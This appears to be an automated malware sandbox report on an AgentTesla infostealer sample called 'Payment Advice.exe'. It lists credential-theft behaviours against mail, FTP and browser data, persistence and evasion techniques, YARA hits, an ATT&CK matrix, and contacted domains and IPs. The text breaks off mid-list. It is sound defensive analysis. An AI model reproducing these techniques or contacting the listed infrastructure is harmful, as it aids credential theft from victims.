                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7816, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 6576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 4092, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7816, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 6576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 4092, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428252 Sample: Payment Advice.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 61 mail.seawaysfreight-bd.com 2->61 63 seawaysfreight-bd.com 2->63 65 api.ipify.org 2->65 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 12 other signatures 2->77 8 Payment Advice.exe 7 2->8         started        12 BjTxJte.exe 2->12         started        14 sFPEKzHsLkYZIz.exe 2->14         started        16 BjTxJte.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\...\sFPEKzHsLkYZIz.exe, PE32 8->57 dropped 59 C:\Users\user\AppData\Local\...\tmp6619.tmp, XML 8->59 dropped 93 Adds a directory exclusion to Windows Defender 8->93 18 Payment Advice.exe 16 5 8->18         started        23 powershell.exe 23 8->23         started        35 2 other processes 8->35 95 Multi AV Scanner detection for dropped file 12->95 97 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->97 99 Machine Learning detection for dropped file 12->99 101 Injects a PE file into a foreign processes 12->101 25 BjTxJte.exe 12->25         started        37 2 other processes 12->37 27 sFPEKzHsLkYZIz.exe 14->27         started        29 schtasks.exe 14->29         started        31 BjTxJte.exe 16->31         started        33 schtasks.exe 16->33         started        signatures6 process7 dnsIp8 67 seawaysfreight-bd.com 94.100.26.91, 49738, 49740, 49747 HVC-ASUS Netherlands 18->67 69 api.ipify.org 104.26.13.205, 443, 49735, 49739 CLOUDFLARENETUS United States 18->69 53 C:\Users\user\AppData\Roaming\...\BjTxJte.exe, PE32 18->53 dropped 55 C:\Users\user\...\BjTxJte.exe:Zone.Identifier, ASCII 18->55 dropped 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->79 81 Tries to steal Mail credentials (via file / registry access) 18->81 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->83 85 Loading BitLocker PowerShell Module 23->85 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        43 conhost.exe 29->43         started        87 Tries to harvest and steal ftp login credentials 31->87 89 Tries to harvest and steal browser information (history, passwords, etc) 31->89 91 Installs a global keyboard hook 31->91 45 conhost.exe 33->45         started        47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Payment Advice.exe39%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    Payment Advice.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe42%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe42%ReversingLabsByteCode-MSIL.Trojan.GenSteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    seawaysfreight-bd.com
                    		94.100.26.91
                    		truefalse
                      		unknown
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high
                        mail.seawaysfreight-bd.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bThePayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://account.dyn.com/Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://mail.seawaysfreight-bd.comPayment Advice.exe, 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000318E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000003247000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.fontbureau.com/designers?Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.goodfont.co.krPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.ipify.org/tPayment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://seawaysfreight-bd.comPayment Advice.exe, 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000318E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000003247000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.carterandcone.comlPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sajatypeworks.comPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netDPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/cThePayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.ipify.orgPayment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cnPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-user.htmlPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://r3.i.lencr.org/09Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 